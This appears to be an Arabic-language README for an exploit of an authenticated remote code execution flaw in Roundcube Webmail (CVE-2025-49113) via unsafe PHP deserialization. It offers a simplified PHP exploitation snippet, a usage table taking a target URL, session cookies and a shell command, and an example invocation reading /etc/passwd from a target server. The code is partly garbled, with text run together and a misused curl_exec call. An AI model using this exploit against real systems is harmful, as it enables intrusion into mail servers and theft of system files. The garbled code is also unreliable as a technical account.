استغلال تنفيذ التعليمات البرمجية عن بُعد المصادق عليه لـ Roundcube Webmail (CVE-2025-49113) عبر إلغاء تسلسل غير آمن. يتضمن حقن جلسة، وتسليم سلسلة أدوات، وتنفيذ أوامر القشرة.
CVE-2025-49113 هي ثغرة حرجة في إلغاء التسلسل غير الآمن في Roundcube Webmail تتيح تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة. تنشأ الثغرة من التعامل غير السليم مع كائنات PHP المسلسلة أثناء عمليات رفع الملفات.
program/steps/mail/attach.inc_file بدون تحقق مناسب_formfilename_formsystem() لتنفيذ أوامر الصدفة// Simplified exploitation flow
$target_url = $base_url . "?_task=mail&_action=upload&_form=injected_session_data";
$post_data = [
'_file' => '{"name":"malicious_object_gadget","path":"..."}',
'file' => curl_file_create('fake.png', 'image/png', 'exploit.png')
];
$response = curl_exec($target_url, $post_data);
// Vulnerable deserialization occurs in attach.inc processing
// Gadget chain triggers command execution: system($_POST['cmd']);
php CVE-2025-49113-exploit_cookies.php <url> <cookies> <command>
| المعامل | الوصف | مثال |
|---|---|---|
<url> | الرابط الأساسي لتثبيت Roundcube | https://mail.example.com/roundcube/ |
<cookies> | ملفات تعريف ارتباط جلسة صالحة | roundcube_sessid=abc123; roundcube_sessauth=xyz456 |
<command> | أمر نظام التشغيل لتنفيذه | id or whoami |
php CVE-2025-49113-exploit_cookies.php \
https://mail.example.com/roundcube/ \
"roundcube_sessid=abc123; roundcube_sessauth=xyz456" \
"cat /etc/passwd"
يتم توفير هذه المعلومات لأغراض تعليمية فقط. الاختبار غير المصرح به على الأنظمة دون إذن صريح غير قانوني. احصل دائمًا على التصريح المناسب قبل إجراء تقييمات الأمان. لا يتحمل المؤلفون والناشرون أي مسؤولية عن أي سوء استخدام لهذه المعلومات.